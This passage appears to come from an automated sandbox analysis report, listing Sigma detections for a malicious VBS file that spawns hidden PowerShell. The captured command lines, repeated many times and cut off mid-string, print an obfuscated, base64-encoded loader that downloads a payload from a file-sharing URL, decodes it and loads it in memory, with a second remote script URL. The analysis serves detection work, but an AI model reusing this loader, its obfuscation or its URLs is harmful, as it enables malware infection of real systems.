})[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloade
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVz
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7800, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", ProcessId: 7800, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVz
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7800, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
                  Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloade
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloade
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", ProcessId: 7800, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVz
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = 